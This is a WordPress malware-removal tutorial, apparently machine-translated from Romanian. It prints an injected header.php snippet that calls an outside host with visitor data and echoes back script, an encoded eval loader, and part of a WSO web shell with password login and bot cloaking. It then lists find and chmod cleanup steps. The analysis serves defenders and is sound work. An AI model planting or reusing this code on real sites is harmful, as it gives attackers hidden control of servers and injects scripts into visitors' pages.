This tutorial presents a particular case in which a WordPress blog has been virus. Remove WordPress PHP virus.
content
Last days I noticed a suspicious code that seems to be a PHP virus for WordPress. The following PHP code was present in header.php, before the line </head>.
<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>This is a PHP code that, as shown, tries to recover the content of a resource on an external server, but the part that refers to the URL is incomplete.
The operating mechanism is slightly more complex and makes this WordPress PHP invisible virus for visitors to the affected sites. Instead, it targets search engines (Google) and implicitly leads to a significant decrease in the number of visitors on the affected websites.
Malware WordPress PHP Malware Details
1. The above code is present in header.php.
2. A file appeared on the server wp-log.php in the folder wp-includes.
3. wp-log.php Contains a encrypted code, but which is relatively easy to decrypt.
<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>Decipting Malware code from wp-log.php :
<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');
if(get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin() {
die("
<pre align=center-->
<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if(!empty($auth_pass)) {
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}
if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>It seems to be a PHP Malware script that contains code to manage authentication and actions on files and directories on a server. It can be very easily seen that this script contains variables such as $auth_pass (authentication password), $default_action (default action), $default_use_ajax (the default use of AJAX) and $default_charset (default character setting).
Obviously, this script has a section that checks HTTP user agents to block access to certain web robots, such as search engines. It also has a section that checks the PHP security mode and sets certain working directors.
4. If WP-Log.php is accessed in the browser, a web page appears with a field of authentication. At first glance it seems to be a file manager through which new files can be easily climbed on the target server.
Cum devirusezi un website WordPress?
Always, the process of manual disorder involves discover and understand first, what was vulnerability.
1. generates a backup for the entire website. It must include both files and database.
2. Determine approximately how long the virus has appeared and searches on the web server the modified or new files created in the approximate time.
For example, if you want to see the files .php created or modified in the last week, execute the command in the server:
find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"It is a simple method by which you can discount the WordPress files and those containing the malware.
3. Check the file .htaccess of suspicious directives. Script permission or execution lines.
4. Check the database. It is very possible that some WordPress posts and pages have been edited with malware or add new users with administrator's role.
5. Check writing permits for folders and files. chmod and chown.
The recommended permissions are: 644 for files and 755 for directors.
find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;6. Update all WordPress Plugins / WordPress Themes.
Related: Fix Redirect WordPress Hack 2023 (Virus Redirect)
Acestea sunt metode “basic” prin care poți să devirusezi un website / blog WordPress. Dacă întâmpini probleme și ai nevoie de ajutor, rubrica de comentarii este deschisă.
